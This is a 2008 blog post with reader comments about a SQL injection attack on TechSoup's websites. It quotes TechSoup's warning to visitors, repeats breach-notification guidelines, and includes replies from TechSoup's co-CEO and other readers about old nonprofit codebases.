I was wondering why Techsoup was down all day. The sad news after the jump:
UPDATE: As of 8/7/2008 3:37 EDT, Techsoup is up and running.
We have further information about what has caused our current website issues. We have suffered a SQL Injection attack. These types of attacks are known to exploit website vulnerabilities with the intent of distributing viruses and malware. We do not yet know all the details of this attack at this time. We do not have any specific evidence that malware or viruses were actually distributed; however, it is possible that people who visited our websites between 8:00PM PDT, Tuesday August 5, 2008 and 7:45AM PDT, Wednesday August 6, 2008 could have been exposed to viruses or malware. The impacted sites are:
* www.techsoup.org
* www.techsoup.org/stock
* www.techsoup.org/mar
* www.compumentor.orgWe are advising anyone who visited any of the listed websites, during the hours noted above, to:
* Make sure your anti-virus software definitions are up-to-date.
* Run a scan of your hard drive to ensure no viruses or malware show up and follow the instructions to quarantine them.
* Review the information at http://www.us-cert.gov/cas/tips/ about managing viruses.
* Please continue to check this webpage [www.techsoup.org] (which is safe!) for further updates.
This sucks for the nonprofit technology community but it is surprising to see SQL injection attacks on old code. There are pretty well known ways to stop a SQL injection attack and they’ve been built into most Web development frameworks and languages. If you want to know what a SQL injection attack is and how to stop it, check out the Wikipedia article.
As you may or may not know, Techsoup was the unlucky victim in another security breach when Convio was hit in November of last year. At the time, I issued some fairly stern remarks about the weak attempts at user notification in regards to username and password breaches. I’m reprinting the remedies here:
Means of Notification
Individually notify those affected whenever possible.
- Send the notice by first-class mail.
- As an alternative, notify by e-mail, if you normally communicate with the affected individuals by e-mail and you have received their prior consent to that form of notification.
- If more than 500,000 individuals were affected, the cost of individual notification is more than $250,000, or you do not have adequate contact information on those affected, provide notice using public communication channels.
- Post the notice conspicuously on your Web site, AND
- Notify through major statewide media television, radio, print), AND
- Send the notice by e-mail to any affected party whose e-mail address you have.
I know the costs are going to be astronomical, but I believe that there’s no guarantee a simple Web page or subsequent alert e-mail is going to capture the entire Techsoup user base. For various reasons, people need to be alerted by all reasonable methods like the ones listed above. At this point, a TV or radio ad or at least something in the Chronicle of Philanthropy and Non-Profit Times is in order.
By the way, I was an unlucky user who was hit by the Convio breach. As a test, I left a few “junk” e-mail accounts and other kinds of accounts with the same username/account combination that was scooped up during the Convio breach by persons unknown. The slow but fairly methodical hacker(s) got to a couple of accounts only in the last month. This suggests a fairly organized criminal enterprise. I would not be surprised that this attack would have similarly long-lasting consequences. I won’t be able to test this effect further as my honeypot accounts no longer have the same username/password combination. I don’t know what information was hit, but my piece of advice to you is to immediately change all username/password combinations that match that of your account on Techsoup.
Loading ...
Marnie Webb, here, co-CEO of TechSoup. Thanks, Allan, for helping to spread the word and advising users to make password changes (below the portion of our message that you quoted). We will, of course, be providing more information to our users through different channels. However, as we are still working on the issues, we wanted to share as quickly as possible and so posted the information on our landing page.
Sorry for the additional comment: we are also keeping http://www.techsoup.org up-to-date so that we can share information as we have it. The full text of the message you quoted is there.
Disappointing, but sadly, not surprising. Techsoup’s codebase is pretty old, and was written before awareness of these issues was as widespread as it is now.
I wouldn’t be surprised to see a lot more attacks like this in the future against large nonprofit targets, since many of them are running similarly old, large custom apps and are tempting targets.
@Marnie Webb: Yeah, I’m glad you’re trying to fix it but a security audit can take forever. No way to revert to an old version of the code and data or afraid it would just be attacked again? I really urge and implore you to consider those guidelines for notification. I can’t say how important it is to reach your user community in as many offline ways as possible to ensure that your users are adequately notified.
@Jon Stahl: I guess you’re right. I’m wondering if it’s not already time to switch over to something open source for Techsoup. There are plenty of new frameworks out there for Techsoup to choose but I’m sure there’s a pretty huge sunk cost that they’d have to think about.
That said, Techsoup is a utility in the nonprofit community now. It occupies a central portion of the nonprofit IT director’s time. It needs more uptime and I think an open source community development effort would work. I would think plenty of folks would pitch in to help out if Techsoup’s code was on an SVN or git repository out there.
Some tech readers might also be interested in more details at:
http://it.slashdot.org/article.pl?sid=08/08/12/1943217
http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
Basically a lot of coldfusion / mssql sites are open to attack. You can find more information about the attack by searching for vernyx
@Donald Lobo: Sorry for the delay in posting your comment — it turns out your comment got sent to spam. WP saw the multiple links and freaked out.